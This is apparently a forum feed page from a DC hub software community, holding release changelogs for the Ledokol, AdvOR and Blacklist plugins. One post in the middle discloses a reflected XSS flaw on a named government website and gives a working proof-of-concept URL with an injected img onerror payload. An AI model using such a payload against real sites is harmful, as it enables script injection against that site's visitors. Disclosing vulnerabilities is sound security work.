Ledokol 2.9.4.62

Changes in 2.9.4.62
[ 47] Fixed: User logger command parameters when searched string is a number
[ 49] Fixed: Country code gag reason parameter could not be empty, report by KCAHDEP
[ 53] Fixed: Invalid comparison of number of days parameter in registered users list cleanup command
[ 58] Fixed: Fake operator key not disappearing after setting a lower class on user, report by sirtrifanoff
[ 58] Changed: VIP kicks are again made with bot nick due to rights restriction and command reservation in Verlihub, report by sirtrifanoff
[ 48] Added: Separate feed for search filter notifications
[ 50] Added: Antispam debug uses operator note to specify entry that caused detection when user is banned, request by KCAHDEP
[ 51] Added: sefiblockmsg configuration to disable block list notification
[ 52] Added: WHOIS lookup using system command
[ 54] Added: History cleanup type parameter, request by Mank
[ 55] Added: Disability of automatic country chatroom entrance with code --, request by Pasha
[ 56] Added: GeoIP ASN information to userinfo and ipinfo commands
[ 57] Added: autosendhelp configuration to disable display of command list on hub help command, request by Reanimator®
[ 59] Added: norepltoops configuration to disable chat replacer in PM to operators, request by sirtrifanoff
[ 60] Added: City gag feature, request by sirtrifanoff
[ 61] Added: Chat code feed notification, request by Alexandr
[ 62] Added: Chat replacer can be removed by LRE, request by sirtrifanoff

File information: Ledokol 2.9.4.62
Posted by ledokol on 2017-11-05 14:070 comments3 likes

AdvOR 0.3.1.5

Changes in 0.3.1.5
- geoip_c.h was updated with GeoIPCountryWhois.csv released on October 4'th; there are 163953 IP ranges having 32 ranges in the fake "A1" country; all 32 ranges were approximated to real countries
- the OpenSSL library was updated to 1.1.0g
- updated directory authorities according to https://atlas.torproject.org/#search/flag:Authority

File information: AdvOR 0.3.1.5
Posted by advor on 2017-11-05 14:060 comments3 likes

Ministry of Defence of Bangladesh - XSS

Vulnerable page: http://www.mod.gov.bd/site/search?key=

PoC
http://www.mod.gov.bd/site/search?key=<!--<img%20src="--><img%20src=x%20onerror=alert(1)//">

You can either include any XSS code in search input box, or request any XSS code directly using GET method and key parameter.



Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2017-09-07 22:041 comment8 likes

AdvOR 0.3.1.4

Changes in 0.3.1.4
- geoip_c.h was updated with GeoIPCountryWhois.csv released on June 7'th; there are 153678 IP ranges having 32 ranges in the fake "A1" country; 31 ranges were approximated to real countries
- the OpenSSL library was updated to 1.1.0f

File information: AdvOR 0.3.1.4
Posted by advor on 2017-06-11 10:480 comments8 likes

Blacklist 1.2.2.6

Changes in 1.2.2.6
# 1.2.2.6 - Fixed bypass of public proxy lookup for local and private IP addresses in chat mode

File information: Blacklist 1.2.2.6
Posted by vhpython on 2017-05-22 12:470 comments9 likes
« Back • 1 • Next »